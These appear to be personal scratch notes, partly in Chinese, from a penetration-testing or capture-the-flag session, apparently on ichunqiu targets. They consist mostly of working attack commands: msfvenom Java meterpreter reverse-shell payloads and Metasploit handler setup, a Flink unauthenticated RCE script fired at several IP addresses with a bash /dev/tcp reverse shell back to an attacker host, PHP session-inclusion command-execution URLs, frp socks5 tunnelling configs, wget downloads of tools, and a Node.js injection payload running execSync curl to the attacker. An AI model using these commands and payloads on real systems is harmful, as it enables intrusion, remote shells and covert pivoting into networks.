msfvenom -p java/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -f jar > nakumura.jar


use exploit/multi/handler

set payload java/meterpreter/reverse_tcp

set lhost 47.94.0.250

msf6 > msfvenom -p java/meterpreter/reverse_tcp LHOST=47.94.0.250 LPORT=1122 -f jar > rce.jar

use exploit/multi/handler
set payload java/shell/reverse_tcp
set LHOST 0.0.0.0
set LPORT 1122
show options

exploit -z -j
run

python2 -c 'import pty; pty.spawn("/bin/bash")'
python2 -m SimpleHTTPServer 8001

cs 
Cobalt strike的使用
https://www.jianshu.com/p/b4acc07b9e40
教你修改cobalt strike的50050端口
https://www.3hack.com/note/96.html
4567

python2 flink-unauth-rce.py -u http://47.104.85.225:8081/ -c "bash -c 'exec bash -i &>/dev/tcp/47.94.0.250/1 <&1'"
python2 flink-unauth-rce.py -u http://47.104.185.21:8081/ -c "bash -c 'exec bash -i &>/dev/tcp/47.94.0.250/1 <&1'"
python2 flink-unauth-rce.py -u http://47.104.135.101:8081/ -c "bash -c 'exec bash -i &>/dev/tcp/47.94.0.250/1 <&1'"

cat /etc/hosts

cat /proc/net/arp
/proc/net/route
/proc/net/tcp


http://0.0.0.0/admin/include123.php?u=/tmp/sess_upload&cmd=echo 111;

http://0.0.0.0/admin/include123.php?u=/tmp/sess_upload2&cmd=echo%2011111;


http://0.0.0.0/admin/include123.php?u=/tmp/sess_6426ec27fa3043c889f800e8b9428b3d&cmd=<?=`$_GET[1]`?>&1=ls%20/
http://0.0.0.0/admin/include123.php?u=/tmp/sess_6426ec27fa3043c889f800e8b9428b3d&cmd=<?=`$_GET[1]`?>&1=bash%20/get????.sh

ver|s:0:"";
ver|s:0:"";user1|s:1:"a";url1|s:0:"";html1|s:1:"v";url2|s:80:"http://0.0.0.0/admin/include123.php?u=/tmp/sess_6426ec27fa3043c889f800e8b9428b3d";


sock5s.ini
frpc
[common]
bind_port = 7006
token = upload


sock5c.ini
[common]
server_addr = 47.94.0.250
server_port = 7006
token = upload


[http_proxy]
type = tcp
remote_port =8010
plugin = socks5

47.94.0.250 8010  socks5
wget http://47.94.0.250:8001/frpc
wget http://47.94.0.250:8001/sock5c.ini

java -jar web.jar 不要高于8u262

/;/admin/test
fastjson1.2.24存在rce漏洞(https://github.com/depycode/fastjson-c3p0)


https://c261f29e51266b7f62f2ebe30c3e0829.oss-cn-beijing.ichunqiu.com/

s%3A3LCVPlLR-lYzazOitpJt-6M78K0ET-Hl.x6QwxzYCHZ%2BKtYcgMB83l1BK4COlFQ0SDk67v9bghuc
s%3A3LCVPlLR-lYzazOitpJt-6M78K0ET-Hl.x6QwxzYCHZ%2BKtYcgMB83l1BK4COlFQ0SDk67v9bghuc
https:oss-cn-beijing.ichunqiu.com/<script>process = this.constructor.constructor.constructor('return process')();a = process.mainModule.require("child_process").execSync("curl 47.94.0.250:1").toString();document.write(a);document.write(this.constructor.constructor.constructor('return process')().toString());</script>

https://0740273766b42cb378c65bc9feae7f9c.oss-cn-beijing.ichunqiu.com/%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

npm如何一键安装package.json里的依赖文件。
https://blog.csdn.net/lydia_liuY/article/details/80816267
npm init
npm install --dependencies
npm install sqlite3
node app

tsc greeter.ts


flag{1}


cmd: whoami
Content-Type: application/json



http://47.94.0.250/x.html.oss-cn-beijing.ichunqiu.com



npm，yarn如何查看源和换源
https://zhuanlan.zhihu.com/p/35856841

25ad9170-3838-4063-a22c-8c42535b33eb.pdf



ssh root@47.94.0.250